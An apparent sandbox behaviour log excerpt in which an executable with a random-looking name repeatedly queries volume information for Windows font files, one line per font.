Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
